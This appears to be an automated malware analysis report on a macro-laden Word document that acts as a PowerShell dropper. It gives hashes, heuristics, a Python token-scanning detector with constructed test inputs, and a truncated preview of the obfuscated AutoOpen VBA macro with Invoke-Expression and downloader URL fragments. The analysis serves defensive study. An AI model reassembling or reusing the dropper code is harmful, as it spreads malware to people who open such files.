Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bbeea8ca3c007807…

MALICIOUS

Office (OLE)

Size: 139.5 KB
Created: 2018-02-15 03:37:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: f6cd95a83e5d8008a3ff3908d7f160b2 SHA-1: 16c4f536b48c4c0c5b66daaf87e79875c7522167 SHA-256: bbeea8ca3c007807c97d35b0a4cdbaf8d899fbf88c804432a034bc4d5ccf875a
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample contains a VBA macro with an AutoOpen entry point that reaches a Shell() call, so the payload runs as soon as the document is opened with macros enabled. The macro is heavily obfuscated: the visible source is padded with arithmetic noise (Int/Oct/Sin expressions over undefined variables, harmless under On Error Resume Next), and the real command is assembled from string fragments passed through HJjkJKD(), whose body lies outside the preview. The fragments are PowerShell: Invoke-Expression, the CoMspeC[4,24,25]-joIN'' idiom ($env:comspec[4,24,25] -join '', which spells "iex" out of C:\WINDOWS\system32\cmd.exe), and -replace/.replace chains that swap the placeholder tokens 9tH, IWp and CWL for quote characters, interleaved with pieces of URLs. The command handed to Shell() is therefore a PowerShell downloader that fetches and runs a second-stage payload; the ClamAV name Doc.Dropper.Agent agrees with this. The URLs extracted from the document body still carry the placeholder tokens, so they are not usable indicators as written, and not every extracted URL is attacker infrastructure (see the per-URL notes under the heuristics).

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6449162-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6449162-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    The document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro source calls Shell(), i.e. it can launch an external process.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    An AutoOpen entry point runs the macro automatically when the document is opened and macros are enabled.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only documents and documents whose source extraction failed, where no readable source is available.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface; by itself it attributes neither a downloader nor a parser CVE.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. A URL by itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it.
    • http://paIWp+IWpcifi9tH+9tHIWp+IWpcbrtoSwDFdjZSiDRXondwEniR (in document text, OLE body). The same fragment appears in the macro source below; it still carries the placeholder tokens IWp and 9tH, and with those removed it reads http://pacificb..., a truncated host name rather than a resolvable URL.
    • http://9tH+9tHc9tH+9tHICWL+CW (in document text, OLE body). Placeholder tokens only; nothing usable can be recovered from it.
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). The standard DrawingML XML namespace found in ordinary Office files; not an indicator of compromise.
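The auto-exec/exec token co-occurrence that the OLE_VBA_AUTOOPEN, OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC findings above rely on, as an added Python example that is not the report tool's code. The token lists, the verdict labels and the three constructed inputs (a decoded source macro shaped like this sample, a p-code-style byte stream with no readable source, and a benign formatting macro) are this example's own assumptions.

```python
"""Added example (not the report tool's code): the token co-occurrence logic
behind the OLE_VBA_AUTOOPEN, OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC
heuristics, applied to constructed inputs. Token lists, stream contents and
verdict labels are this example's own choices."""
import re

# Names Office treats as auto-execution entry points (Word and Excel).
AUTOEXEC_TOKENS = (b"AutoOpen", b"AutoExec", b"AutoClose", b"AutoNew",
                   b"Document_Open", b"Workbook_Open")
# Tokens that indicate process launch, download or object execution.
EXEC_TOKENS = (b"Shell", b"WScript.Shell", b"CreateObject", b"URLDownloadToFile",
               b"powershell", b"Invoke-Expression", b".Run", b".Exec")


def find_tokens(blob: bytes, tokens) -> set[str]:
    """Case-insensitive substring search. No word boundaries on purpose: in a
    p-code/cache stream the names sit between length bytes, not whitespace,
    so the same scan works on decoded source and on a raw stream."""
    return {t.decode() for t in tokens if re.search(re.escape(t), blob, re.IGNORECASE)}


def classify(blob: bytes) -> dict:
    """Return the tokens found plus a verdict mirroring the report's severities:
    an auto-exec token together with an exec token is the high-severity case."""
    auto = find_tokens(blob, AUTOEXEC_TOKENS)
    execs = find_tokens(blob, EXEC_TOKENS)
    if auto and execs:
        verdict = "autoexec+exec"
    elif auto:
        verdict = "autoexec-only"
    elif execs:
        verdict = "exec-only"
    else:
        verdict = "none"
    return {"autoexec": sorted(auto), "exec": sorted(execs), "verdict": verdict}


# Constructed sample 1: decoded source in the shape of the macro in this report.
SOURCE_MACRO = b"""Attribute VB_Name = "ThisDocument"
Sub AutoOpen()
    On Error Resume Next
    cmd = "powershell -nop -w hidden -e " & payload
    Shell cmd, vbHide
End Sub
"""

# Constructed sample 2: no readable source, only a p-code-style stream in which
# the identifiers survive as length-prefixed byte strings.
PCODE_STREAM = (b"\x01\x16\x03\x00\x08AutoOpen\x00\x00\x00\x05Shell\x00\x21\x0c"
                b"CreateObject\x00\x0dWScript.Shell\x00\xff")

# Constructed sample 3: an ordinary formatting macro, no entry point, no exec.
BENIGN_MACRO = b"""Sub BoldHeadings()
    Selection.Font.Bold = True
End Sub
"""

if __name__ == "__main__":
    for name, blob in (("source", SOURCE_MACRO), ("pcode", PCODE_STREAM), ("benign", BENIGN_MACRO)):
        print(name, classify(blob))
```

Both the source macro and the p-code-style stream come back as "autoexec+exec", the benign macro as "none"; a macro with only a Document_Open handler and no exec token lands in the medium "autoexec-only" bucket, which is the analyst-facing signal rather than a verdict on its own.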

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 27872 bytes
SHA-256: 1ebdcbf47fb52e16ac52ee2ae499f22fbe3d26628b32943f2913d30c2fc0128e
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bldBujaKzliDKf"
Function GPHJTzfQiWjtvW()
On Error Resume Next
kvtCVkS = (rXjXUNKX - Int(zVSHOCoslJft) * lOVQTEEGhAh / Oct(uvudtJVRIWN) - (VIzroHMKXIlSCD - Sin(8982454)))
iQEmsSQU = (TiQVla - Int(GuOrAKcZ) * AZvKFNS / Oct(nWKlKbbpPP) - (iGsKvnszaPMAvj - Sin(4394190)))
flbkkLiUL = (dIjAGMqh - Int(QjwSnCk) * ivIIOzXMQrKbW / Oct(BnKwjfP) - (RPKviEvimNbFQ - Sin(7630638)))
inQQXuXzCv = (jOdWCfhsWp) + HJjkJKD("ilwenv:CoMspeC[4,24,25]-joIN'')((('INvokE-EXPrESSiOn( ((C'+'WL. '+'(jTShAIq", 4, 65)
rwQnvIVJLid = (swTUTRlFzz - Int(zOZCjXSb) * wkEDd / Oct(mXzrWZiJV) - (votVEP - Sin(6547045)))
PXXhXsKu = (bDTkFF - Int(mDlhIuPrwfOHFd) * TEEsojZGwhCzc / Oct(DBSsujWsb) - (QfwzqqH - Sin(5449394)))
OwFOXFzAjq = (jkOjMQONzp - Int(GwmSt) * wPLtUbdrcI / Oct(cPFZZTspoVFc) - (WZDaFTtiDNu - Sin(8621315)))
FTnQfbHEnt = (GsBhJHpVFfm) + HJjkJKD("slChkUPfzcmOtjzOrkwinjPJ+'CHar]92-rePlACe([CHar]109+IWp+IWp'+'[CHar]89+[CHar]7C'+'WL+CWL3),[CHar]'+'36  -rePlAC'+'e 9tHGz49tH,[CHar]39) )IWp).REPLAC'+'e(IWp'+'9tHIWp,[strCWL+CWLiNg][cHar]39).REPLACe(IWpqjjpniXN", 25, 180)
MrGwi = (vYClIPHYC - Int(jJidjCh) * UElrTzZpz / Oct(wFEFk) - (TkjCbrT - Sin(2433654)))
hvFqRDGui = (YvXvQvCaVSb - Int(EEDMTQFZzGaY) * JwTitckY / Oct(uDCtiGw) - (inJcPffqHbN - Sin(7530635)))
vTKuREYpo = (RUzaGzivcqr - Int(sKzKZiz) * RYnPsuRnol / Oct(Wldci) - (TcHOk - Sin(1084219)))
qvordX = (hjbjducEHqnf) + HJjkJKD("NtwBFNMZvKGRrVLcZCCsZMJiSralhe9tH+IWp+IWp'+'9t'+'Halt9tH+'+'9tHh.c9tH+9tHom/Q'+'w9tH+9tHce/?http9tH+CWL+'+'CWL9tH://gasvers9tH+9tHorgwb", 26, 108)
hOYohKlabPq = (FrOhTq - Int(cXwHICIHbNjBTk) * ZUdOHwoJ / Oct(PYbnWwiaqmFo) - (nzojNAAzOoVp - Sin(3537879)))
SJCpZNEmj = (EEiBoNIrkbVki - Int(JKhibnjfZbj) * IpBkGzECiVIk / Oct(advNNLcV) - (oEGqNiNYf - Sin(1425137)))
pzcnpNL = (AFSqzVXj - Int(AoCwNBKlSM) * GSnBwdP / Oct(ZoGqASQVKFO) - (ovsUzBKdMUbFS - Sin(8443932)))
GViDwozzC = (LhuGroVbOhQH) + HJjkJKD("YpVbjvH i9CWL+CWLtH+9tHn 9tH+9tHm'+'YIADCX)9tH+9tH{trCWL+CW'+'Ly9tH+9tH{m9tH+9tHYIYY9tH+9tHU.9tH+9tHZ29tIWp+IWpH+9tHg9tH+9tHDoh6nWnl9tH+9tHh9tH+9tH6nOadCWL+CWLFIh6'+'nHwqZMSnjamkbSppuMrUGizr", 7, 161)
TXzRXRGO = (DTbKaTCuTlW - Int(MAXIGj) * tLsmA / Oct(FZBAjjhTwCwQ) - (HzOzB - Sin(3895949)))
vkvjVUk = (BauasXNb - Int(UKhaVU) * AunFplQzYsFcG / Oct(MrSkniibHI) - (FNbrRqim - Sin(713586)))
TGJBLLDOmwo = (EOPaPJw - Int(ARlVb) * TPqiqP / Oct(miljYpGGB) - (pCQHcDJYUi - Sin(4922133)))
HlwCjc = (nuzBiwfA) + HJjkJKD("bQNhjzwuUbWPVpIQrdWDce 9tHZ2g9tH,[CHaCWL+CWLr]34  -rePlACe(['+'CHar]10IWp+IWp0+[CHa'+'r]54+[CWL+CWLCHar]73),['GDKZcLJXawLA", 21, 90)
TLkJwSL = (qqUquwqvSL - Int(qMhJVhzinDznVi) * CitOa / Oct(tZShAsiJAnSZ) - (jqSnZHqn - Sin(9153759)))
HWFEAv = (rDzHqwMBEl - Int(zmObVpU) * mPhOBBNjq / Oct(GjBwwaiA) - (oNolNnJjDDLE - Sin(3515615)))
zPzJnaoInZ = (SIKKpzFcM - Int(hzBJznozV) * jIwiT / Oct(sSJffPoOjp) - (QpDfLASDQmAk - Sin(3074406)))
rGBUjaTu = (zwvopSj) + HJjkJKD("SlPEQs+'http://paIWp+IWpcifi9tH+9tHIWp+IWpcbrtoSwDFdjZSiDRXondwEniR", 7, 38)
ilwiVr = (AXIRYU - Int(faDnsh) * PRjaYZfHZazss / Oct(clHwabPr) - (RpUBiF - Sin(7624695)))
vazGUUGTr = (NFZRZliOAi - Int(whUfcpCpwpRGd) * KPkDXAClz / Oct(mTBDAYjawXtY) - (JsMbQrlvzvtOVz - Sin(2150842)))
qhNAp = (iqMijtJozp - Int(FrJGimSaL) * YluNomX / Oct(piaYzS) - (jpNQiYcaUjE - Sin(8104971)))
cckBCCGDhj = (FnThqSInZ) + HJjkJKD("zdHtpZprojJbjTOdBHrw'+'9tH+9tHa9tH+9tHndanorphanspIWCWL+CWLp+IWprIWp+IWpoject9t'+'H+9tH.or9tH+9tHg/9tH+9tIWp+IWpHxIeIW'+'p+XVBUbJPiX", 18, 106)
IJctmN = (nwLZjkwirN - Int(DZhNcOTSJz) * RQXAKzPSdzNXd / Oct(tspKKD) - (wjtHMdzjdmAf - Sin(9281117)))
rwSjUijli = (vCfazSZjiq - Int(EEiVi) * ztCVji / Oct(zVSjzKMrjiwqJ) - (MkPMECFIZON - Sin(9879127)))
wGfRwoTrmW = (AltJOXmccA - Int(jTdJXZkiVYnJm) * bbnpvE / Oct(AfMFmVkTW) - (jjZdlZ - Sin(9166856)))
KAMAVLpku = (jKKwjtrZzzFK) + HJjkJKD("pvzfBOXtH+ Gz4d6I9t
... (truncated)